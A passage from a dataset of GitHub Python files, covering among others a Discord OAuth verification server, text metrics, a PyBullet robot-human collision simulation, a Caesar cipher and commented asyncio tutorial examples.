(x,y,index)\nax = fig.add_subplot(111)\nax.set_xlabel('x')\nax.set_ylabel('y')\n\n# Plot XY limit and grid\nplt.xlim([-55, 55])\nplt.ylim([-55, 55])\nplt.grid(b=True, which='major')\nax.scatter( polyObj.x, polyObj.y, s=50, marker= 'o', facecolors='none', edgecolors='red' )\n#ax.scatter( polyObj.xt, polyObj.yt, s=50, marker= '^', facecolors='none', edgecolors='blue' )\n\n# Start Routing (x,y) -> (xt,yt) -> (x,y)\nprint( ' total point %d ' %( len(rx)) )\nx_ = rx[0]\ny_ = ry[0]\nnPoint = len( rx )\nn = polyObj.n\nfor i in range( nPoint -1 ) :\n dX = rx[i+1] - x_\n dY = ry[i+1] - y_\n # print(\" i= \" + str(i) + \"( \" + str( i[0]) + \", \" + str(i[1]) + \")\" )\n if i == 0 :\n ax.quiver(x_, y_, dX, dY, angles='xy', scale_units='xy', scale=1, color='green', picker=5)\n #elif (i%(n*2+1) ) == (n*2):\n elif rs[i+1] == 0:\n ax.quiver(x_, y_, dX, dY, angles='xy', scale_units='xy', scale=1, color='red', picker=5)\n elif rs[i+1] == 1 :\n ax.quiver(x_, y_, dX, dY, angles='xy', scale_units='xy', scale=1, color='purple', picker=5)\n elif rs[i+1] == 3 :\n ax.quiver(x_, y_, dX, dY, angles='xy', scale_units='xy', scale=1, color='blue', picker=5)\n elif rs[i+1] == 4 :\n ax.quiver(x_, y_, dX, dY, angles='xy', scale_units='xy', scale=1, color='black', picker=5)\n else :\n continue\n\n x_ = rx[i+1]\n y_ = ry[i+1]\n\nplt.show()\n'''\n\n\n\n","repo_name":"sckao/MyGCodeReader","sub_path":"Polygram.py","file_name":"Polygram.py","file_ext":"py","file_size_in_byte":16364,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"32"} +{"seq_id":"42369741461","text":"import discord_api\nfrom quart import Quart, redirect, request, render_template\nfrom discord.ext.ipc import Client\nimport aiohttp\nimport os\nimport uvicorn\nimport logging\nfrom dotenv import load_dotenv\n\nload_dotenv()\n\napp = Quart(__name__)\nipc = Client(host = \"bot\", secret_key=os.getenv(\"IPC_SECRET\"))\n\n@app.errorhandler(500)\nasync def bad(error):\n return error\n\n@app.before_serving\nasync def create_client_session():\n app.aiohttp_session = aiohttp.ClientSession(raise_for_status=True)\n \n@app.after_serving\nasync def close_client_session():\n await app.aiohttp_session.close()\n\n@app.get(\"/\")\nasync def root():\n return redirect(\"https://discord.gg/tradecentral\")\n\n@app.get(\"/linked-role\")\nasync def linked_role():\n state, url = await discord_api.get_oauth_url()\n response = redirect(url)\n response.set_cookie('clientState', str(state))\n return response\n\n\n@app.get(\"/discord-oauth-callback\")\nasync def oauth():\n code = request.args.get('code')\n discord_state = request.args.get('state')\n client_state = request.cookies.get(\"clientState\")\n \n if code is None or discord_state is None:\n return await render_template('fails.html', message='You should not be here!')\n if discord_state != client_state:\n return await render_template('fails.html', message='Unauthorized')\n\n try:\n tokens = await discord_api.get_oauth_tokens(session=app.aiohttp_session, code=code)\n data_me = await discord_api.get_user_data(session=app.aiohttp_session, tokens=tokens)\n connections = await discord_api.get_user_connections(session=app.aiohttp_session, tokens=tokens)\n guilds = await discord_api.get_user_guilds(session=app.aiohttp_session, tokens=tokens)\n except discord_api.DiscordAuthException:\n return await render_template('fails.html', message='Could not authorize with discord')\n except discord_api.DiscordAPIError:\n return await render_template('fails.html', message='Error while querying discord 
api')\n    except discord_api.HTTPException:\n        return await render_template('fails.html', message=f'Error while querying discord api')\n\n    response = await ipc.request(\n        \"resolve_metadata\", \n        user_data=data_me, \n        connections=connections,\n        guilds=guilds,\n        user_agent=request.headers.get('User-Agent', \"None\"), \n        remote_addr=request.headers.get(\"X-Forwarded-For\")\n    )\n    \n    data = response.response\n\n    if data is None:\n        logging.error(f\"Could not resolve metadata for {data_me['user']['id']}\")\n        return await render_template('fails.html', message='Could not resolve metadata')\n\n    exception = data.get('exception', None)\n    member = data.get('member', None)\n    user = data.get('user', None)\n    metadata = data.get('metadata', None)\n\n    if not user:\n        logging.error(f\"User not found for {data_me['user']['id']}\")\n        return await render_template('fails.html', message='User not found.')\n    if str(user['id']) != str(data_me['user']['id']):\n        logging.error(f\"User ID mismatch: {user['id']} != {data_me['user']['id']}\")\n        return await render_template('fails.html', message='User ID mismatch. Please try again or contact support.')\n    if not member:\n        logging.error(f\"Member not found for {data_me['user']['id']}\")\n        return await render_template('fails.html', message='You need to join Trade Central first.')\n    if exception:\n        logging.error(f\"Exception while resolving metadata for {data_me['user']['id']}: {exception}\")\n        return await render_template(\n            'fails.html', message=f'Your account is not eligible for verification for the following reason: {exception}')\n    if not metadata:\n        logging.error(f\"Metadata not found for {data_me['user']['id']}\")\n        return await render_template('fails.html', message='Metadata not found.')\n\n    try:\n        logging.info(f\"Pushing metadata for {user['id']}: {metadata}\")\n        await discord_api.push_metadata(session=app.aiohttp_session, tokens=tokens, metadata=metadata)\n    except Exception as e:\n        logging.error(f\"Exception while pushing metadata for {user['id']}: {e}\")\n        return await render_template('fails.html', message='Exception while pushing metadata')\n    \n    return await render_template('success.html', name='Success')\n\n\nif __name__ == \"__main__\":\n    uvicorn.run(\"app:app\", host=\"localhost\", port=5005, log_level=\"info\")","repo_name":"ippess/role-verification-server","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":4416,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"7836374099","text":"from Levenshtein import distance\nfrom nltk import ngrams\nfrom collections import Counter\n\ndef cer(predicted,actual):\n    return distance(predicted,actual)\n\ndef create_ngram_map(text,n=4):\n    ngram_list=[]\n    for i in range(n):\n        ngram_list=ngram_list+[ng for ng in ngrams(text,i)]\n    return Counter(ngram_list)\n    \n\ndef bleu(predicted,actual,order=4):\n    bleu_prod=1\n    for i in range(order):\n        pred_ngram_map=create_ngram_map(predicted,i+1)\n        act_ngram_map=create_ngram_map(actual,i+1)\n        bleu_sum=0\n        ngsize=len(act_ngram_map)\n        for word,count in act_ngram_map.items():\n            if pred_ngram_map.get(word):\n                bleu_sum=bleu_sum+min(pred_ngram_map[word],count)\n        bleu_prod=bleu_prod*(bleu_sum/ngsize)\n    return bleu_prod**(1/order)\n\n\n\n    \n    \n\n\n\n\n\n\n    \n\n    \n","repo_name":"multimedia-lab/English2HindiTransliteration","sub_path":"Codebase/measure.py","file_name":"measure.py","file_ext":"py","file_size_in_byte":840,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"}
+{"seq_id":"37202641512","text":"import json\nimport os\n\n\ndef run():\n path = os.path.join(os.getcwd(), 'data', 'schema.json')\n with open(path, 'r') as fr:\n schema = json.load(fr)\n\n cmd_list = list()\n for table, attr in schema.items():\n s = ''\n for n, i in enumerate(attr):\n s += '%s:line[%d]' % (i, n)\n if n < len(attr) - 1:\n s += ', '\n cmd_1 = \"LOAD CSV FROM 'file:///%s.csv' AS line\\n\" % table\n cmd_list.append(cmd_1)\n cmd_2 = \"MERGE (:%s {%s});\\n\" % (table, s)\n cmd_list.append(cmd_2)\n\n print(len(cmd_list))\n out_path = os.path.join(os.getcwd(), 'cypher', 'load.cypher')\n with open(out_path, 'w') as fw:\n fw.writelines(cmd_list)\n\n\nif __name__ == '__main__':\n run()\n\n# type cypher\\load.cypher | cypher-shell.bat -u neo4j -p 1234\n","repo_name":"xzk-seu/360KG","sub_path":"cypher_cmd_gen.py","file_name":"cypher_cmd_gen.py","file_ext":"py","file_size_in_byte":814,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"32"} +{"seq_id":"19643822435","text":"import sys\nsys.path.append(\"../\")\nfrom filified import *\n\nops = file_to_arr(\"input.txt\",lambda x: x.strip())\n\n\ndef render_screen(screen):\n for idx in range(1,len(screen)):\n print(screen[idx],end=\"\")\n if idx % 40 == 0:\n print(\"\")\n \n\nscreen = [\".\"] * 241\n\n\n\nx = 1\ncycle = 1\nla_somme = 0\nwanted = [20,60,100,140,180,220]\nfor idx , op in enumerate(ops):\n print(cycle)\n if op.find(\"noop\") != -1:\n if x <= cycle % 40 <= x+2:\n screen[cycle] = \"#\"\n cycle += 1\n else:\n for _ in range(2):\n if x <= cycle % 40 <= x+2:\n screen[cycle] = \"#\"\n cycle += 1\n x += int(op.split(\" \")[1])\n\n\nrender_screen(screen)\nprint()\n\n","repo_name":"t-88/advent-of-coding","sub_path":"2022/day10/part2.py","file_name":"part2.py","file_ext":"py","file_size_in_byte":721,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"32"} +{"seq_id":"20714676559","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\n#---[Name & Dates]----------------------------------------------------------#\n# Filename ~ args.py [Created: 2023-03-21 | 10:26 - AM] #\n# [Updated: 2023-04-10 | 13:18 - PM] #\n#---[Info]------------------------------------------------------------------#\n# All arguments of the 'gitpy' command #\n# Language ~ Python3 #\n#---[Authors]---------------------------------------------------------------#\n# Thomas Pellissier (MyMeepSQL) #\n# Jonas Petitpierre (Bashy) #\n#---[Operating System]------------------------------------------------------#\n# Developed for Linux #\n#---[License]---------------------------------------------------------------#\n# GNU General Public License v3.0 #\n# ------------------------------- #\n# #\n# This program is free software; you can redistribute it and/or modify #\n# it under the terms of the GNU General Public License as published by #\n# the Free Software Foundation; either version 2 of the License, or #\n# (at your option) any later version. #\n# #\n# This program is distributed in the hope that it will be useful, #\n# but WITHOUT ANY WARRANTY; without even the implied warranty of #\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the #\n# GNU General Public License for more details. #\n# #\n# You should have received a copy of the GNU General Public License along #\n# with this program; if not, write to the Free Software Foundation, Inc., #\n# 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA. 
#\n#---------------------------------------------------------------------------#\n\n# Import section\nimport sys\nfrom gettext import gettext as _\n\n## Third party libraries\nimport src.tools.argparse as argparse\nfrom src.config import Configuration\nfrom src.util.colors import Color\n\n# Custom help formatter (not in use because to the custom help message in the 'help_messages.py' file)\nclass BetterHelpFormatter(argparse.HelpFormatter):\n def add_usage(self, usage, actions, groups, prefix=None):\n if prefix is None:\n prefix = Color.s('{SB2}{bold}Usage{W}: ')\n\n return super(BetterHelpFormatter , self).add_usage(usage, actions, groups, prefix)\n \n def _fill_text(self, text, width, indent):\n return ''.join(indent + line for line in text.splitlines(keepends=True))\n\n# Main\nclass Arguments(argparse.ArgumentParser):\n '''\n All arguments of the 'gitpy' command\n '''\n\n @classmethod\n def get_arguments(cls):\n '''\n Returns parser.args() containing all program arguments\n '''\n\n \"\"\"\n Keyword Arguments:\n\n - option_strings -- A list of command-line option strings which\n should be associated with this action.\n\n - dest -- The name of the attribute to hold the created object(s)\n\n - nargs -- The number of command-line arguments that should be\n consumed. By default, one argument will be consumed and a single\n value will be produced. Other values include:\n - N (an integer) consumes N arguments (and produces a list)\n - '?' consumes zero or one arguments\n - '*' consumes zero or more arguments (and produces a list)\n - '+' consumes one or more arguments (and produces a list)\n Note that the difference between the default and nargs=1 is that\n with the default, a single value will be produced, while with\n nargs=1, a list containing a single value will be produced.\n\n - const -- The value to be produced if the option is specified and the\n option uses an action that takes no values.\n\n - default -- The value to be produced if the option is not specified.\n\n - type -- A callable that accepts a single string argument, and\n returns the converted value. The standard Python types str, int,\n float, and complex are useful examples of such callables. If None,\n str is used.\n\n - choices -- A container of values that should be allowed. If not None,\n after a command-line argument has been converted to the appropriate\n type, an exception will be raised if it is not a member of this\n collection.\n\n - required -- True if the action must always be specified at the\n command line. This is only meaningful for optional command-line\n arguments.\n\n - help -- The help string describing the argument.\n\n - metavar -- The name to be used for the option's argument with the\n help string. 
If None, the 'dest' value will be used as the name.\n        \"\"\"\n\n        gitpy = Arguments(\n            prog='gitpy',\n            description='GitPy - A Python3 tool to search for and download a GitHub repository directly in the terminal',\n            usage='gitpy [options]',\n            add_help=False,\n            allow_abbrev=False,\n            prefix_chars='-',\n            formatter_class=lambda prog: BetterHelpFormatter(prog, max_help_position=80, width=100,indent_increment=2),\n        )\n\n        cls._add_main_args(gitpy.add_argument_group(Color.s('{SB2}{bold}Main options{W}')))\n        cls._add_installation_args(gitpy.add_argument_group(Color.s('{SB2}{bold}Installation options{W}')))\n        cls._add_repo_args(gitpy.add_argument_group(Color.s('{SB2}{bold}Repository options{W}')))\n        cls._add_output_args(gitpy.add_argument_group(Color.s('{SB2}{bold}Output options{W}')))\n        cls._add_additional_args(gitpy.add_argument_group(Color.s('{SB2}{bold}Additional options{W}')))\n        cls._add_informations_args(gitpy.add_argument_group(Color.s('{SB2}{bold}Informations options{W}')))\n        cls._add_miscellaneous_args(gitpy.add_argument_group(Color.s('{SB2}{bold}Miscellaneous options{W}')))\n        # cls._add_test_args(gitpy.add_argument_group(Color.s('{SB2}{bold}Test options{W}')))\n\n        # argcomplete.autocomplete(parser)\n        return gitpy.parse_args()\n\n\n    # -------------------- [ Main Arguments ] -------------------- #\n    @classmethod\n    def _add_main_args(cls,main):\n        main.add_argument(\n            '--console',\n            action='store_true',\n            dest='console',\n            help='start the main console of GitPy'\n        )\n        main.add_argument(\n            '--cli',\n            action='store_true',\n            dest='cli',\n            help='start the CLI environment of GitPy'\n        )\n\n\n    # -------------------- [ Installation Arguments ] -------------------- #\n    @classmethod\n    def _add_installation_args(cls,install):\n        install.add_argument(\n            '-i','--install',\n            action='store_true',\n            dest='install',\n            help='install GitPy with all dependencies on your system'\n        )\n        install.add_argument(\n            '--uninstall',\n            action='store_true',\n            help='uninstall GitPy from your system'\n        )\n        install.add_argument(\n            '--skip-update',\n            action='store_true',\n            dest='skip_update',\n            help='skip the system update phase during the installation of GitPy'\n        )\n        install.add_argument(\n            '--offline',\n            action='store_true',\n            dest='offline',\n            help='install GitPy with the local file already downloaded. By default, the Installer downloads the latest version from GitHub and installs it on the machine'\n        )\n        install.add_argument(\n            '-iP','--install-path',\n            type=str,\n            nargs='?',\n            const='0',\n            metavar='PATH',\n            dest='install_path',\n            help=Color.s('the path where GitPy will be installed (default: {G}%s{W})' % Configuration.DEFAULT_INSTALL_PATH),\n        )\n\n\n    # -------------------- [ Repository Arguments ] -------------------- #\n    @classmethod\n    def _add_repo_args(cls,repo):\n        repo.add_argument(\n            '-cr','--check-repo',\n            action='store_true',\n            dest='check_repo',\n            help=Color.s('check if the repository in the notification config file has a new commit available and send a notification via mail if it\\'s the case')\n        )\n\n        repo.add_argument(\n            '-us','--unsub',\n            action='store_true',\n            dest='unsub',\n            help=Color.s('allows you to delete a subscription by mail from a GitHub repository')\n        )\n\n\n    # -------------------- [ Output Arguments ] -------------------- #\n    @classmethod\n    def _add_output_args(cls,output):\n        output.add_argument(\n            '-q','--quiet',\n            action='store_true',\n            help=Color.s('prevent header from displaying. 
{O}Warning{W}: bypass any \"Are you sure?\" message!')\n        )\n        output.add_argument(\n            '-v','--verbose',\n            type=int,\n            nargs='?',\n            const=1,\n            choices=[1,2,3],\n            metavar='LEVEL',\n            dest='verbose',\n            help=Color.s('verbosity level: 1-2 (default: {G}0{W} | const: {G}%(const)s{W})')\n        )\n\n\n    # -------------------- [ Additional Arguments ] -------------------- #\n    @classmethod\n    def _add_additional_args(cls,add):\n        add.add_argument(\n            '-y','--no-confirm',\n            action='store_true',\n            dest='no_confirm',\n            help='bypass any and all \"Are you sure?\" messages.'\n        )\n\n\n    # -------------------- [ Informations Arguments ] -------------------- #\n    @classmethod\n    def _add_informations_args(cls,info):\n        info.add_argument(\n            '--info',\n            action='store_true',\n            help='show more informations about GitPy and exit'\n        )\n        info.add_argument(\n            '-h','--help',\n            action='store_true',\n            # action='help',\n            help='show this help message and exit'\n        )\n        info.add_argument(\n            '-V','--version',\n            action='store_true',\n            help=f\"show program's version and exit\"\n        )\n\n\n    # -------------------- [ Miscellaneous Arguments ] -------------------- #\n    @classmethod\n    def _add_miscellaneous_args(cls,misc):\n        misc.add_argument(\n            '--update',\n            action='store_true',\n            dest='update',\n            help='update GitPy directly from GitHub'\n        )\n        misc.add_argument(\n            '-fu','--force-update',\n            action='store_true',\n            dest='force_update',\n            help='update GitPy even if the version on the machine is already the latest'\n        )\n        misc.add_argument(\n            '--show-config',\n            action='store_true',\n            dest='show_config',\n            help='show the value of the config file'\n        )\n        misc.add_argument(\n            '--show-env-var',\n            type=str,\n            nargs='?',\n            const='install_path',\n            choices=['install_path','notif_conf_path'],\n            dest='show_env_var',\n            help='prompt the value of an environment variable'\n        )\n        misc.add_argument(\n            '--remove-cache',\n            action='store_true',\n            dest='remove_cache',\n            help='delete any \\'__pycache__\\' folder in GitPy\\'s directory'\n        )\n\n\n    # -------------------- [ Tests Arguments ] -------------------- #\n    # @classmethod\n    # def _add_test_args(cls,test):\n    #     test.add_argument(\n    #         '--process',\n    #         action='store_true',\n    #         dest='process',\n    #     )\n","repo_name":"MyMeepSQL/GitPy","sub_path":"src/args.py","file_name":"args.py","file_ext":"py","file_size_in_byte":12353,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"32"} +{"seq_id":"33760149067","text":"import numpy as np\nfrom sklearn.preprocessing import OneHotEncoder\nimport utils\n\n'''\nInput:\n    there are 34 attributes, missing marked with ?\n\nOutput:\n    (data, labels)\n'''\ndef parse_dermatology(fp):\n    with open(fp) as f:\n        text = f.read()\n\n    enc = OneHotEncoder(handle_unknown='error', categories='auto')\n\n    labels = []\n    unencoded_data = []\n    for line in text.splitlines():\n        splitted = line.split(\",\")\n        assert(len(splitted) == 35)\n\n        missing_val = False\n        for attr in splitted:\n            if attr == '?':\n                missing_val = True\n                break\n        if missing_val:\n            continue\n\n        labels.append(int(splitted[34]))\n        unencoded_data.append(splitted[:34])\n\n    data = enc.fit_transform(unencoded_data).toarray()\n    print(data.shape)\n    return (data, np.array(labels))\n\nif __name__ == \"__main__\":\n    (data, labels) = parse_dermatology(\"../data/dermatology/dermatology.data\")\n    print(data[:10])\n    print(labels[:10])\n    (train_data, train_labels, test_data, test_labels) = utils.split_train_test(data, labels)\n    utils.save_protobuf(train_data, train_labels, \"dermatology_train\")\n    
utils.save_protobuf(test_data, test_labels, \"dermatology_test\")\n\n","repo_name":"kaiwenw/DPDDT","sub_path":"python/preprocess/parse_dermatology.py","file_name":"parse_dermatology.py","file_ext":"py","file_size_in_byte":1240,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"32"} +{"seq_id":"5185892983","text":"import re\n\n\nclass Post():\n def __init__(self, DataBase):\n self.database = DataBase\n self.table = 'post'\n\n def get_by_id(self, _id):\n item = self.database.find(self.table, {\"_id\": _id})\n return item\n\n def remove_by_id(self, _id):\n return self.database.delete(self.table, {\"_id\": int(_id)})\n\n def remove_comment(self, post_id, comment_id):\n return self.database.update(\n self.table,\n {\"_id\": int(post_id)},\n {\"$pull\":\n {\"comments\": {\"_id\": int(comment_id)}}\n },\n False\n )\n\n def latest(self, _from, _to, category):\n if category == 'All':\n search = {}\n else:\n category = [i for i in category if i != 'All']\n category = [re.compile(i, re.IGNORECASE) for i in category]\n search = {\"tags.name\": {\"$all\": category}}\n\n print(search)\n items = self.database.db[self.table].find(\n search).sort(\"_id\", -1)[_from:_to]\n return items\n\n def create(self, data):\n # here only the required fields are passed\n _post = {\n '_id': data['_id'],\n 'title': data['title'],\n 'tags': data['tags'],\n 'body': data['body'],\n 'timestamp': data['timestamp'],\n 'user': data['user'],\n 'institution': data['institution'],\n 'email': data['email'],\n 'comments_count': data['comments_count'],\n 'comments': data['comments'],\n 'like': data['likes'],\n 'date': data['date'],\n 'views': data['views'],\n 'user_id': data['user_id'],\n 'followers': []\n }\n\n try:\n assert(self.database.insert(self.table, _post))\n return _post\n except Exception as e:\n return {'status': False, 'message': str(e)}\n\n def add_comment(self, comment, post_id):\n update = self.database.update(\n self.table,\n {\"_id\": post_id},\n {\"$push\": {\"comments\": comment}},\n True\n )\n\n # update the number of posts:\n number_posts = len(self.database.find(\n self.table, {\"_id\": post_id})[0]['comments'])\n\n # update the number of posts\n update = self.database.update(\n self.table,\n {\"_id\": post_id},\n {\"$set\": {\"comments_count\": number_posts}},\n True\n )\n\n def update_post(self, data):\n # update title\n update = self.database.update(\n self.table,\n {\"_id\": int(data['_id'])},\n {\"$set\": {\n \"title\": data['title'],\n \"body\": data['body'],\n \"tags\": data['tags']\n }\n },\n True\n )\n\n return {\"status\": True}\n\n def update(self, field, value, _id):\n # update master table with the new data from the manual inspection\n update = self.database.update(\n self.table,\n {\"_id\": _id},\n {\n \"$set\": {\n field: value\n }\n },\n True\n )\n\n return update\n\n def push(self, _id, key, value):\n update = self.database.update(\n self.table,\n {\"_id\": _id},\n {\"$addToSet\": {key: value}},\n True\n )\n\n return update\n\n def pull(self, _id, key, value):\n update = self.database.update(\n self.table,\n {\"_id\": _id},\n {\"$pull\": {key: {\"_id\": value['_id']}}},\n True\n )\n return update\n","repo_name":"gaarangoa/ARGminer","sub_path":"backend/rest/MetadataInterface/PostClass.py","file_name":"PostClass.py","file_ext":"py","file_size_in_byte":3669,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"32"} +{"seq_id":"32445750420","text":"#! 
/usr/bin/env python3\n\nimport rospy\nimport pybullet as pyb\nimport pybullet_data\nfrom humanoid_bullet_control import HumanoidControl\nfrom cobot_utils.ur_bullet_control import URControl\nfrom cobot_utils.ur_execution_manager import URExecutionManager\nfrom cobot_utils.human_pose_data_streamer import HumanPoseDataStreamer\nimport numpy as np\n\nimport time\n\ndef main():\n    # ros node initialization\n    rospy.init_node(\"pybullet_ros_bridge\", anonymous=True)\n    \n    # pybullet initialization\n    gui_id = pyb.connect(pyb.GUI)\n    pyb.setAdditionalSearchPath(pybullet_data.getDataPath(), physicsClientId=gui_id)\n    pyb.setGravity(0, 0, -10)\n    pyb.setRealTimeSimulation(True)\n\n    # load ground URDF\n    ground_id = pyb.loadURDF('plane.urdf', [0, 0, 0], useFixedBase=True, physicsClientId=gui_id)\n\n    # load ur_controller\n    ur_control = URControl(gui_id)\n\n    # humanoid controller\n    humanoid_control = HumanoidControl(gui_id)\n    humanoid_control.load_config('/home/omkar/ros_workspaces/robotics_lab_ws/src/cobot_bullet_sim/config/humanoid_controllers.yaml')\n\n    # human pose data loader\n    pose_stream = HumanPoseDataStreamer('/home/omkar/ros_workspaces/robotics_lab_ws/src/cobot_bullet_sim/data/hammer5.npy', fps=15)\n    pose_stream.start()\n\n    ur_mgr = URExecutionManager()\n    \n    time.sleep(1)\n\n    # load models\n    ur_control.load_model(\n        '/home/omkar/ros_workspaces/robotics_lab_ws/src/fmauch_universal_robot/ur_description/urdf/model.urdf',\n        [0.5, -0.2, 0.5]\n    )\n    humanoid_control.load_model('humanoid/humanoid.urdf', pose_stream.get_joint_position_set())\n\n    while not rospy.is_shutdown():\n        ur_control.update(ur_mgr.get_joint_state())\n        humanoid_control.update(pose_stream.get_joint_position_set())\n\n        collision_info = pyb.getClosestPoints(humanoid_control._humanoid_id, ur_control._ur_id, 0.05)\n        if len(collision_info) > 0:\n            ur_mgr.cancel_execution()\n\nif __name__ == '__main__':\n    main()","repo_name":"OmkarKabadagi5823/cobot_bullet_sim_ros","sub_path":"scripts/cobot_bullet_sim.py","file_name":"cobot_bullet_sim.py","file_ext":"py","file_size_in_byte":1966,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"}
+{"seq_id":"9923109318","text":"\"\"\"Caesar cipher.\"\"\"\n\n\ndef encode(word, shift):\n    \"\"\"Encode a message using a Caesar cipher.\"\"\"\n    string = \"abcdefghijklmnopqrstuvwxyz\"\n    result = \"\"\n    for letter in word:\n        if letter.isalpha():\n            number = (string.index(letter))\n            new_number = (number + shift) % 26  # wrap around the alphabet: e.g. 'i' (8) + 6 -> 14 -> 'o'\n            result += string[new_number]\n        else:\n            result += letter\n\n    return result\n\n\nprint(encode(\"i like turtles\", 6))\nprint(encode(\"o roqk zaxzrky\", 20))\nprint(encode(\"example\", 1))\nprint(encode(\"don't change\", 0))\nprint(encode('the quick brown fox jumps over the lazy dog.', 7))\n","repo_name":"saplee/Python","sub_path":"EX/ex02_math/caesar.py","file_name":"caesar.py","file_ext":"py","file_size_in_byte":604,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"}
+{"seq_id":"46294849582","text":"import asyncio\nfrom random import random\nimport time\nfrom urllib.parse import urlsplit\n\n\n\"\"\"\nAn example of getting the current Task from the main coroutine\n\"\"\"\n#\n#\n# async def main(): # Define the main coroutine\n#     print('main coroutine started') # Report a message\n#     task = asyncio.current_task() # Get the current task\n#     print(task) # Report the task details\n#\n# asyncio.run(main()) # Run the main coroutine\n
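#\n# The printed task looks roughly like:\n#   <Task pending name='Task-1' coro=<main() running at ...>>\n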
########################################################################################################################\n\n\n\"\"\"\nIn this example we first create 10 tasks, each of which runs the same coroutine.\nThe main coroutine then gets the set of all tasks scheduled or running in the program and reports their details.\n\"\"\"\n\n\n# # coroutine for a task\n# async def task_coroutine(value):\n#     # report a message\n#     print(f'task {value} is running')\n#     # block for a moment\n#     await asyncio.sleep(1)\n#\n#\n# # define a main coroutine\n# async def main():\n#     # report a message\n#     print('main coroutine started')\n#     # start many tasks\n#     started_tasks = [asyncio.create_task(task_coroutine(i)) for i in range(10)]\n#     # allow some of the tasks time to start\n#     await asyncio.sleep(0.1)\n#     # get all tasks\n#     tasks = asyncio.all_tasks()\n#     # report all tasks\n#     for task in tasks:\n#         print(f'> {task.get_name()}, {task.get_coro()}')\n#     # wait for all tasks to complete\n#     for task in started_tasks:\n#         await task\n#\n#\n# # start the asyncio program\n# asyncio.run(main())\n########################################################################################################################\n\n\n\"\"\"\nIn this example the main() coroutine (which is also the entrypoint) uses a list comprehension to create a list of\ntask_coro coroutine objects, which is passed to the gather() function and unpacked by the * operator into 10 separate\narguments. main() then awaits the Future object returned by the gather() call, suspending and waiting for all of the\nscheduled coroutines to finish executing. The coroutines run, report their results and sleep before completing.\nOnly after that does main() resume its work and report success with the message 'main done'.\n\"\"\"\n\n\n# # coroutine used for a task\n# async def task_coro(value):\n#     # report a message\n#     print(f'>task {value} executing')\n#     # sleep for a moment\n#     await asyncio.sleep(1)\n#\n#\n# # coroutine used for the entry point\n# async def main():\n#     # report a message\n#     print('main starting')\n#     # create many coroutines\n#     coros = [task_coro(i) for i in range(10)]\n#     # run the tasks\n#     await asyncio.gather(*coros)\n#     # report a message\n#     print('main done')\n#\n#\n# # start the asyncio program\n# asyncio.run(main())\n
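#\n# NOTE: gather() returns its results in the order the awaitables were passed in, regardless of the order in which they finish.\n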
########################################################################################################################\n\n\n\"\"\"\nThis example shows how we can use the wait() function to wait for a set of tasks to complete.\nAgain, the main() coroutine is used as the entry point of the asyncio program. It creates a list of 10 tasks, each\ngiven a random integer argument from 0 to 9. The main coroutine then suspends and waits for all of the tasks to\ncomplete. Each task generates a random value between 0 and 1, sleeps for that many seconds,\nand then reports the value. Once all of the tasks are done, main() reports it.\n\"\"\"\n\n\n# # coroutine to execute in a new task\n# async def task_coro(arg):\n#     # generate a random value between 0 and 1\n#     value = random()\n#     # block for a moment\n#     await asyncio.sleep(value)\n#     # report the value\n#     print(f'>task {arg} done with {value}')\n#\n#\n# # main coroutine\n# async def main():\n#     # create many tasks\n#     tasks = [asyncio.create_task(task_coro(i)) for i in range(10)]\n#     # wait for all tasks to complete\n#     done, pending = await asyncio.wait(tasks)\n#     # report results\n#     print('All done')\n#\n#\n# # start the asyncio program\n# asyncio.run(main())\n########################################################################################################################\n\n\n\"\"\"\nIn this example the entrypoint main() creates the task_coro coroutine and calls wait_for(), passing it the task and a\ntimeout for the task's execution in seconds. The main() coroutine suspends, waiting for task_coro to finish, and\nresumes once the timeout expires: wait_for() cancels task_coro, which honours the cancellation request, a\nTimeoutError exception is raised, and the work is terminated. main() resumes and handles\nthe TimeoutError.\n\"\"\"\n\n\n# # example of waiting for a coroutine with a timeout\n#\n# # coroutine to execute in a new task\n# async def task_coro(arg):\n#     # generate a random value between 1 and 2\n#     value = 1 + random()\n#     # report message\n#     print(f'>task got {value}')\n#     # block for a moment\n#     await asyncio.sleep(value)\n#     # report all done\n#     print('>task done')\n#\n#\n# # main coroutine\n# async def main():\n#     # create a task\n#     task = task_coro(1)\n#     # execute and wait for the task with a timeout\n#     try:\n#         await asyncio.wait_for(task, timeout=0.2)\n#     except asyncio.TimeoutError:\n#         print('Wake up, Neo, you are obosralsya')\n#\n#\n# # start the asyncio program\n# asyncio.run(main())\n
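#\n# NOTE: since Python 3.11, asyncio.TimeoutError is an alias of the built-in TimeoutError, so either name can be caught here.\n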
########################################################################################################################\n\n\n\"\"\"\nIn the entrypoint main() a coroutine coro is created, wrapped in the task task and protected with a shield as shielded.\nIt is then passed to cancel_task(), which is itself wrapped in a task; later main() awaits the shielded\ntask, expecting a CancelledError exception. simple_task runs and then sleeps; cancel_task starts,\nsleeps for a moment and cancels the shielded task, and the request reports a successful cancellation. The CancelledError\nexception is raised in the cancellation-protected Future object, not in the inner simple_task.\n\"\"\"\n\n# example of using asyncio shield to protect a task from cancellation\n#\n#\n# # define a simple asynchronous coroutine\n# async def simple_task(number):\n#     # block for a moment\n#     await asyncio.sleep(1)\n#     # return the argument\n#     return number\n#\n#\n# # cancel the given task after a moment\n# async def cancel_task(task):\n#     # block for a moment\n#     await asyncio.sleep(0.2)\n#     # cancel the task\n#     was_cancelled = task.cancel()\n#     print(f'cancelled: {was_cancelled}')\n#\n#\n# # define a simple coroutine\n# async def main():\n#     # create the coroutine\n#     coro = simple_task(1)\n#     # create a task\n#     task = asyncio.create_task(coro)\n#     # create the shielded task\n#     shielded = 